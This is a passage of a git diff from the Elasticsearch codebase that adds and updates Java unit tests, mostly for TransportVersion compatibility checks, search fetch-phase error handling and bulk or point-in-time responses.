Set.of(TransportVersion.zero(), TransportVersion.current(), TransportVersion.minimumCompatible()); assertThat(TransportVersion.current(), sameInstance(TransportVersion.fromId(TransportVersion.current().id()))); final int iters = scaledRandomIntBetween(20, 100); for (int i = 0; i < iters; i++) { @@ -207,4 +212,146 @@ public void testToString() { assertEquals("2000099", TransportVersion.fromId(2_00_00_99).toString()); assertEquals("5000099", TransportVersion.fromId(5_00_00_99).toString()); } + + public void testDuplicateConstants() { + List<TransportVersion> tvs = TransportVersion.getAllVersions(); + TransportVersion previous = tvs.get(0); + for (int i = 1; i < tvs.size(); i++) { + TransportVersion next = tvs.get(i); + if (next.id() == previous.id()) { + throw new AssertionError("Duplicate transport version id: " + next.id()); + } + previous = next; + } + } + + public void testLatest() { + TransportVersion latest = TransportVersion.parseFromBufferedReader( + "", + "/transport/definitions/" + Version.CURRENT.major + "." + Version.CURRENT.minor + ".csv", + TransportVersion.class::getResourceAsStream, + (c, p, br) -> TransportVersion.fromBufferedReader(c, p, true, false, br, Integer.MAX_VALUE) + ); + // TODO: once placeholder is removed, test the latest known version can be found fromName + // assertThat(latest, is(TransportVersion.fromName(latest.name()))); + } + + public void testSupports() { + byte[] data0 = "100001000,3001000".getBytes(StandardCharsets.UTF_8); + TransportVersion test0 = TransportVersion.fromBufferedReader( + "", + "testSupports0", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data0), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 2003000, null).supports(test0), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test0), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test0), is(true)); + + byte[] data1 = "3002000".getBytes(StandardCharsets.UTF_8); + TransportVersion test1 = TransportVersion.fromBufferedReader( + "", + "testSupports1", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data1), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 2003000, null).supports(test1), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test1), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test1), is(false)); + assertThat(new TransportVersion(null, 3002000, null).supports(test1), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test1), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test1), is(true)); + + byte[] data2 = "3003000,2001001,1001001".getBytes(StandardCharsets.UTF_8); + TransportVersion test2 = TransportVersion.fromBufferedReader( + "", + "testSupports2", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data2), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 1001000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 1001001, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 1001002, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 1002000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 1002001, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 2001000, null).supports(test2), is(false)); + assertThat(new
TransportVersion(null, 2001001, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 2001002, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 2003000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 2003001, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test2), is(false)); + assertThat(new TransportVersion(null, 3003000, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 3003001, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 3003002, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 3003003, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test2), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test2), is(true)); + + byte[] data3 = "100002000,3003001,2001002".getBytes(StandardCharsets.UTF_8); + TransportVersion test3 = TransportVersion.fromBufferedReader( + "", + "testSupports3", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data3), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 1001001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1001002, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1001003, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1002001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 1002002, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 2001001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 2001002, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 2001003, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 2003000, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 2003001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3003000, null).supports(test3), is(false)); + assertThat(new TransportVersion(null, 3003001, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 3003002, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 3003003, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 3004000, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test3), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test3), is(true)); + + byte[] data4 = "100002000,3003002,2001003,1001002".getBytes(StandardCharsets.UTF_8); + TransportVersion test4 = TransportVersion.fromBufferedReader( + "", + "testSupports4", + false, + true, + new BufferedReader(new InputStreamReader(new ByteArrayInputStream(data4), StandardCharsets.UTF_8)), + 5000000 + ); + assertThat(new TransportVersion(null, 1001001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 1001002, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 1001003, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 1002001, null).supports(test4), is(false)); + assertThat(new
TransportVersion(null, 1002002, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 1002003, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 2001002, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 2001003, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 2001004, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 2003000, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 2003001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3001000, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3001001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3003000, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3003001, null).supports(test4), is(false)); + assertThat(new TransportVersion(null, 3003002, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 3003003, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 3003004, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 3004000, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 100001000, null).supports(test4), is(true)); + assertThat(new TransportVersion(null, 100001001, null).supports(test4), is(true)); + } } diff --git a/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java b/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java index 2ddcaa5d97033..504ef488c5a92 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java +++ b/server/src/test/java/org/elasticsearch/action/admin/cluster/node/tasks/TaskManagerTestCase.java @@ -194,8 +194,7 @@ public TestNode(String name, ThreadPool threadPool, Settings settings) { TransportService.NOOP_TRANSPORT_INTERCEPTOR, boundTransportAddressDiscoveryNodeFunction, null, - taskManager, - Tracer.NOOP + taskManager ); taskManager.setTaskCancellationService(new TaskCancellationService(transportService)); transportService.start(); diff --git a/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java b/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java index 1d625cabe561d..4aa3673e604b0 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/cluster/snapshots/status/SnapshotStatsTests.java @@ -78,7 +78,7 @@ public void testMissingStats() throws IOException { // Verify round trip Transport serialization.
for (var transportVersion : List.of( - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersions.SNAPSHOT_INDEX_SHARD_STATUS_MISSING_STATS, TransportVersion.current() )) { diff --git a/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java b/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java index b9dec26736cf2..15674e84f7170 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/cluster/state/ClusterStateRequestTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.admin.cluster.state; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.common.io.stream.BytesStreamOutput; import org.elasticsearch.common.io.stream.StreamInput; @@ -39,7 +38,7 @@ public void testSerialization() throws Exception { TransportVersion testVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); if (randomBoolean()) { diff --git a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java index 824ad22b1af20..f62fd1408345b 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveClusterActionTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.admin.indices.resolve; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.ActionFilter; import org.elasticsearch.action.support.ActionFilters; import org.elasticsearch.cluster.node.VersionInformation; @@ -54,7 +53,7 @@ public void testCCSCompatibilityCheck() { .build(); ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion nextTransportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion nextTransportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); try { TransportService transportService = MockTransportService.createNewService( Settings.EMPTY, diff --git a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java index 871932ca9dbc9..6e37335603572 100644 --- a/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/admin/indices/resolve/TransportResolveIndexActionTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.admin.indices.resolve; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.ActionFilter; import org.elasticsearch.action.support.ActionFilters; @@ -52,7 +51,7 @@ public void testCCSCompatibilityCheck() throws Exception { .build(); 
ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); try { TransportService transportService = MockTransportService.createNewService( Settings.EMPTY, diff --git a/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java b/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java index 042a8422ca64d..7c1aad1a2af54 100644 --- a/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java +++ b/server/src/test/java/org/elasticsearch/action/bulk/BulkResponseTests.java @@ -144,6 +144,18 @@ public void testToXContentPlacesErrorsFirst() throws IOException { } } + public void testCombineNoIngest() { + BulkResponse first = new BulkResponse(new BulkItemResponse[0], 1, NO_INGEST_TOOK); + BulkResponse second = new BulkResponse(new BulkItemResponse[0], 1, NO_INGEST_TOOK); + assertThat(BulkResponse.combine(List.of(first, second)).getIngestTookInMillis(), equalTo(NO_INGEST_TOOK)); + } + + public void testCombineOneIngest() { + BulkResponse first = new BulkResponse(new BulkItemResponse[0], 1, NO_INGEST_TOOK); + BulkResponse second = new BulkResponse(new BulkItemResponse[0], 1, 2); + assertThat(BulkResponse.combine(List.of(first, second)).getIngestTookInMillis(), equalTo(2L)); + } + private static Tuple success( DocWriteRequest.OpType opType, XContentType xContentType diff --git a/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java b/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java index 403c395e31b57..0fa419be7b60b 100644 --- a/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java +++ b/server/src/test/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingServiceTests.java @@ -1343,4 +1343,46 @@ private static Decision.Inputs createDecisionInputsForPeriodLoggerTests(int writ 3 ); } + + public void testCalculateReturnsNotApplicableForLookupIndexMode() { + var projectId = randomProjectIdOrDefault(); + ProjectMetadata.Builder builder = ProjectMetadata.builder(projectId); + DataStream dataStream = createLookupModeDataStream(builder); + ClusterState state = createClusterStateWithDataStream(builder); + + AutoShardingResult autoShardingResult = service.calculate( + state.projectState(projectId), + dataStream, + createIndexStats(1, 1.0, 1.0, 1.0) + ); + assertThat(autoShardingResult, is(NOT_APPLICABLE_RESULT)); + assertThat(decisionsLogged, hasSize(0)); + } + + public void testCalculateReturnsNotApplicableForLookupIndexModeWithNullStats() { + var projectId = randomProjectIdOrDefault(); + ProjectMetadata.Builder builder = ProjectMetadata.builder(projectId); + DataStream dataStream = createLookupModeDataStream(builder); + ClusterState state = createClusterStateWithDataStream(builder); + + AutoShardingResult autoShardingResult = service.calculate(state.projectState(projectId), dataStream, null); + assertThat(autoShardingResult, is(NOT_APPLICABLE_RESULT)); + assertThat(decisionsLogged, hasSize(0)); + } + + private DataStream createLookupModeDataStream(ProjectMetadata.Builder builder) { + DataStream dataStream = DataStream.builder(dataStreamName, List.of(new 
Index("test-index", randomUUID()))) + .setGeneration(1) + .setIndexMode(IndexMode.LOOKUP) + .build(); + builder.put(dataStream); + return dataStream; + } + + private ClusterState createClusterStateWithDataStream(ProjectMetadata.Builder builder) { + return ClusterState.builder(ClusterName.DEFAULT) + .nodes(DiscoveryNodes.builder().add(DiscoveryNodeUtils.create("n1"))) + .putProjectMetadata(builder.build()) + .build(); + } } diff --git a/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java b/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java index b60d3e0f08569..9632382996a7e 100644 --- a/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/fieldcaps/TransportFieldCapabilitiesActionTests.java @@ -10,7 +10,6 @@ package org.elasticsearch.action.fieldcaps; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.ActionFilter; import org.elasticsearch.action.support.ActionFilters; import org.elasticsearch.cluster.node.VersionInformation; @@ -52,7 +51,7 @@ public void testCCSCompatibilityCheck() { .build(); ActionFilters actionFilters = mock(ActionFilters.class); when(actionFilters.filters()).thenReturn(new ActionFilter[0]); - TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersions.MINIMUM_CCS_VERSION, true); + TransportVersion transportVersion = TransportVersionUtils.getNextVersion(TransportVersion.minimumCCSVersion(), true); try { TransportService transportService = MockTransportService.createNewService( Settings.EMPTY, diff --git a/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java b/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java index 1978189c9dde4..b6ca12368f762 100644 --- a/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/FetchSearchPhaseTests.java @@ -50,6 +50,7 @@ import org.elasticsearch.search.SearchPhaseResult; import org.elasticsearch.search.SearchShardTarget; import org.elasticsearch.search.fetch.FetchPhase; +import org.elasticsearch.search.fetch.FetchPhaseExecutionException; import org.elasticsearch.search.fetch.FetchSearchResult; import org.elasticsearch.search.fetch.FetchSubPhase; import org.elasticsearch.search.fetch.FetchSubPhaseProcessor; @@ -63,6 +64,7 @@ import org.elasticsearch.search.internal.ShardSearchRequest; import org.elasticsearch.search.lookup.Source; import org.elasticsearch.search.profile.ProfileResult; +import org.elasticsearch.search.profile.Profilers; import org.elasticsearch.search.profile.SearchProfileQueryPhaseResult; import org.elasticsearch.search.profile.SearchProfileShardResult; import org.elasticsearch.search.query.QuerySearchResult; @@ -873,6 +875,63 @@ public StoredFieldsSpec storedFieldsSpec() { } } + public void testTimerStoppedAndSubPhasesExceptionsPropagate() throws IOException { + // if the timer is not stopped properly whilst profiling the fetch phase the exceptions + // in sub phases#setNextReader will not propagate as the cause that failed the fetch phase (instead a timer illegal state exception + // will propagate) + // this tests ensures that exceptions in sub phases are propagated correctly as the cause of the fetch phase failure (which in turn + // implies the timer was handled correctly) + 
Directory dir = newDirectory(); + RandomIndexWriter w = new RandomIndexWriter(random(), dir); + + String body = "{ \"thefield\": \" " + randomAlphaOfLength(48_000) + "\" }"; + for (int i = 0; i < 10; i++) { + Document document = new Document(); + document.add(new StringField("id", Integer.toString(i), Field.Store.YES)); + w.addDocument(document); + } + if (randomBoolean()) { + w.forceMerge(1); + } + IndexReader r = w.getReader(); + w.close(); + ContextIndexSearcher contextIndexSearcher = createSearcher(r); + try ( + SearchContext searchContext = createSearchContext( + contextIndexSearcher, + true, + new NoopCircuitBreaker(CircuitBreaker.REQUEST), + true + ) + ) { + FetchPhase fetchPhase = new FetchPhase(List.of(fetchContext -> new FetchSubPhaseProcessor() { + @Override + public void setNextReader(LeafReaderContext readerContext) throws IOException { + throw new IOException("bad things"); + } + + @Override + public void process(FetchSubPhase.HitContext hitContext) throws IOException { + Source source = hitContext.source(); + hitContext.hit().sourceRef(source.internalSourceRef()); + } + + @Override + public StoredFieldsSpec storedFieldsSpec() { + return StoredFieldsSpec.NEEDS_SOURCE; + } + })); + FetchPhaseExecutionException fetchPhaseExecutionException = assertThrows( + FetchPhaseExecutionException.class, + () -> fetchPhase.execute(searchContext, IntStream.range(0, 100).toArray(), null) + ); + assertThat(fetchPhaseExecutionException.getCause().getMessage(), is("bad things")); + } finally { + r.close(); + dir.close(); + } + } + private static ContextIndexSearcher createSearcher(IndexReader reader) throws IOException { return new ContextIndexSearcher(reader, null, null, new QueryCachingPolicy() { @Override @@ -910,13 +969,22 @@ public StoredFieldsSpec storedFieldsSpec() { } private static SearchContext createSearchContext(ContextIndexSearcher contextIndexSearcher, boolean allowPartialResults) { - return createSearchContext(contextIndexSearcher, allowPartialResults, null); + return createSearchContext(contextIndexSearcher, allowPartialResults, null, false); } private static SearchContext createSearchContext( ContextIndexSearcher contextIndexSearcher, boolean allowPartialResults, @Nullable CircuitBreaker circuitBreaker + ) { + return createSearchContext(contextIndexSearcher, allowPartialResults, circuitBreaker, false); + } + + private static SearchContext createSearchContext( + ContextIndexSearcher contextIndexSearcher, + boolean allowPartialResults, + @Nullable CircuitBreaker circuitBreaker, + boolean profileEnabled ) { IndexSettings indexSettings = new IndexSettings( IndexMetadata.builder("index") @@ -999,6 +1067,11 @@ public CircuitBreaker circuitBreaker() { return super.circuitBreaker(); } } + + @Override + public Profilers getProfilers() { + return profileEnabled ? 
new Profilers(contextIndexSearcher) : null; + } }; searchContext.addReleasable(searchContext.fetchResult()::decRef); searchContext.setTask(new SearchShardTask(-1, "type", "action", "description", null, Collections.emptyMap())); diff --git a/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java b/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java index 008230c5e3fe3..3ed63ff5e90d1 100644 --- a/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/MultiSearchRequestTests.java @@ -9,6 +9,7 @@ package org.elasticsearch.action.search; +import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.action.support.IndicesOptions; import org.elasticsearch.common.CheckedBiConsumer; import org.elasticsearch.common.Strings; @@ -537,6 +538,14 @@ public void testFailOnExtraCharacters() throws IOException { } } + public void testNullIndex() throws IOException { + ElasticsearchParseException e = expectThrows(ElasticsearchParseException.class, () -> parseMultiSearchRequestFromString(""" + {"index": null} + { "query": {"match_all": {}}} + """)); + assertThat(e.getMessage(), containsString("Expected a list of strings but got null")); + } + private static MultiSearchRequest mutate(MultiSearchRequest searchRequest) throws IOException { MultiSearchRequest mutation = copyRequest(searchRequest); List> mutators = new ArrayList<>(); diff --git a/server/src/test/java/org/elasticsearch/action/search/OpenPointInTimeResponseTests.java b/server/src/test/java/org/elasticsearch/action/search/OpenPointInTimeResponseTests.java new file mode 100644 index 0000000000000..3ed88419ab8d5 --- /dev/null +++ b/server/src/test/java/org/elasticsearch/action/search/OpenPointInTimeResponseTests.java @@ -0,0 +1,57 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.action.search; + +import org.elasticsearch.common.bytes.BytesArray; +import org.elasticsearch.common.bytes.BytesReference; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xcontent.ToXContent; +import org.elasticsearch.xcontent.XContentBuilder; +import org.elasticsearch.xcontent.XContentType; + +import java.io.IOException; +import java.util.Base64; +import java.util.Locale; + +import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertToXContentEquivalent; + +public class OpenPointInTimeResponseTests extends ESTestCase { + + public void testIdCantBeNull() { + BytesReference pointInTimeId = null; + expectThrows(NullPointerException.class, () -> { new OpenPointInTimeResponse(pointInTimeId, 11, 8, 2, 1); }); + } + + public void testToXContent() throws IOException { + String id = "test-id"; + BytesReference pointInTimeId = new BytesArray(id); + + BytesReference actual; + try (XContentBuilder builder = XContentBuilder.builder(XContentType.JSON.xContent())) { + OpenPointInTimeResponse response = new OpenPointInTimeResponse(pointInTimeId, 11, 8, 2, 1); + response.toXContent(builder, ToXContent.EMPTY_PARAMS); + actual = BytesReference.bytes(builder); + } + + String encodedId = Base64.getUrlEncoder().encodeToString(BytesReference.toBytes(pointInTimeId)); + BytesReference expected = new BytesArray(String.format(Locale.ROOT, """ + { + "id": "%s", + "_shards": { + "total": 11, + "successful": 8, + "failed": 2, + "skipped": 1 + } + } + """, encodedId)); + assertToXContentEquivalent(expected, actual, XContentType.JSON); + } +} diff --git a/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java b/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java index d7348833c757a..2a9d12b27507d 100644 --- a/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java +++ b/server/src/test/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncActionTests.java @@ -13,6 +13,7 @@ import org.apache.lucene.search.SortField; import org.apache.lucene.search.TopFieldDocs; import org.apache.lucene.search.TotalHits; +import org.apache.lucene.util.BytesRef; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.OriginalIndices; import org.elasticsearch.cluster.ClusterName; @@ -21,6 +22,7 @@ import org.elasticsearch.cluster.node.DiscoveryNodeUtils; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.NoopCircuitBreaker; +import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.lucene.search.TopDocsAndMaxScore; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.core.TimeValue; @@ -41,6 +43,7 @@ import org.elasticsearch.transport.Transport; import org.elasticsearch.transport.TransportService; +import java.io.IOException; import java.util.Collections; import java.util.List; import java.util.Map; @@ -48,6 +51,7 @@ import java.util.concurrent.CountDownLatch; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.LongSupplier; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; @@ -243,4 +247,191 @@ protected void run() { assertThat(((FieldDoc) phase.sortedTopDocs().scoreDocs()[0]).fields[0], equalTo(0)); } } + + static class BadRawDocValueFormat implements DocValueFormat { + @Override + 
public String getWriteableName() { + return "bad"; + } + + @Override + public void writeTo(StreamOutput out) throws IOException {} + + @Override + public Object format(long value) { + if (value == Long.MAX_VALUE) { + // Simulate a bad value that cannot be formatted correctly + throw new IllegalArgumentException("Cannot format Long.MAX_VALUE"); + } + return RawDocValueFormat.INSTANCE.format(value); + } + + @Override + public Object format(double value) { + return RawDocValueFormat.INSTANCE.format(value); + } + + @Override + public Object format(BytesRef value) { + return RawDocValueFormat.INSTANCE.format(value); + } + + @Override + public long parseLong(String value, boolean roundUp, LongSupplier now) { + return RawDocValueFormat.INSTANCE.parseLong(value, roundUp, now); + } + + @Override + public double parseDouble(String value, boolean roundUp, LongSupplier now) { + return RawDocValueFormat.INSTANCE.parseDouble(value, roundUp, now); + } + + @Override + public BytesRef parseBytesRef(Object value) { + return RawDocValueFormat.INSTANCE.parseBytesRef(value); + } + + @Override + public Object formatSortValue(Object value) { + return RawDocValueFormat.INSTANCE.formatSortValue(value); + } + } + + // Test what happens if doc formatter fails to format the bottom sort values + public void testBadFormatting() throws Exception { + final TransportSearchAction.SearchTimeProvider timeProvider = new TransportSearchAction.SearchTimeProvider( + 0, + System.nanoTime(), + System::nanoTime + ); + + Map<String, Transport.Connection> lookup = new ConcurrentHashMap<>(); + DiscoveryNode primaryNode = DiscoveryNodeUtils.create("node1"); + DiscoveryNode replicaNode = DiscoveryNodeUtils.create("node2"); + lookup.put("node1", new SearchAsyncActionTests.MockConnection(primaryNode)); + lookup.put("node2", new SearchAsyncActionTests.MockConnection(replicaNode)); + + int numShards = randomIntBetween(10, 20); + int numConcurrent = randomIntBetween(1, 4); + AtomicInteger numWithTopDocs = new AtomicInteger(); + AtomicInteger successfulOps = new AtomicInteger(); + AtomicBoolean canReturnNullResponse = new AtomicBoolean(false); + var transportService = mock(TransportService.class); + when(transportService.getLocalNode()).thenReturn(primaryNode); + SearchTransportService searchTransportService = new SearchTransportService(transportService, null, null) { + @Override + public void sendExecuteQuery( + Transport.Connection connection, + ShardSearchRequest request, + SearchTask task, + ActionListener<SearchPhaseResult> listener + ) { + int shardId = request.shardId().id(); + if (request.canReturnNullResponseIfMatchNoDocs()) { + canReturnNullResponse.set(true); + } + if (request.getBottomSortValues() != null) { + numWithTopDocs.incrementAndGet(); + } + QuerySearchResult queryResult = new QuerySearchResult( + new ShardSearchContextId("N/A", 123), + new SearchShardTarget("node1", new ShardId("idx", "na", shardId), null), + null + ); + try { + SortField sortField = new SortField("RegistrationDate", SortField.Type.LONG); + queryResult.topDocs( + new TopDocsAndMaxScore( + new TopFieldDocs( + new TotalHits(1, TotalHits.Relation.GREATER_THAN_OR_EQUAL_TO), + new FieldDoc[] { new FieldDoc(0, Float.NaN, new Object[] { Long.MAX_VALUE }) }, + new SortField[] { sortField } + ), + Float.NaN + ), + new DocValueFormat[] { new BadRawDocValueFormat() } + ); + queryResult.from(0); + queryResult.size(1); + successfulOps.incrementAndGet(); + queryResult.incRef(); + new Thread(() -> ActionListener.respondAndRelease(listener, queryResult)).start(); + } finally { + queryResult.decRef(); + } + } + }; +
CountDownLatch latch = new CountDownLatch(1); + List<SearchShardIterator> shardsIter = SearchAsyncActionTests.getShardsIter( + "idx", + new OriginalIndices(new String[] { "idx" }, SearchRequest.DEFAULT_INDICES_OPTIONS), + numShards, + randomBoolean(), + primaryNode, + replicaNode + ); + final SearchRequest searchRequest = new SearchRequest(); + searchRequest.setMaxConcurrentShardRequests(numConcurrent); + searchRequest.setBatchedReduceSize(2); + searchRequest.source(new SearchSourceBuilder().size(1).sort(SortBuilders.fieldSort("timestamp"))); + searchRequest.source().trackTotalHitsUpTo(2); + searchRequest.allowPartialSearchResults(false); + SearchPhaseController controller = new SearchPhaseController((t, r) -> InternalAggregationTestCase.emptyReduceContextBuilder()); + SearchTask task = new SearchTask(0, "n/a", "n/a", () -> "test", null, Collections.emptyMap()); + try ( + QueryPhaseResultConsumer resultConsumer = new QueryPhaseResultConsumer( + searchRequest, + EsExecutors.DIRECT_EXECUTOR_SERVICE, + new NoopCircuitBreaker(CircuitBreaker.REQUEST), + controller, + task::isCancelled, + task.getProgressListener(), + shardsIter.size(), + exc -> {} + ) + ) { + SearchQueryThenFetchAsyncAction action = new SearchQueryThenFetchAsyncAction( + logger, + null, + searchTransportService, + (clusterAlias, node) -> lookup.get(node), + Collections.singletonMap("_na_", AliasFilter.EMPTY), + Collections.emptyMap(), + EsExecutors.DIRECT_EXECUTOR_SERVICE, + resultConsumer, + searchRequest, + null, + shardsIter, + timeProvider, + new ClusterState.Builder(new 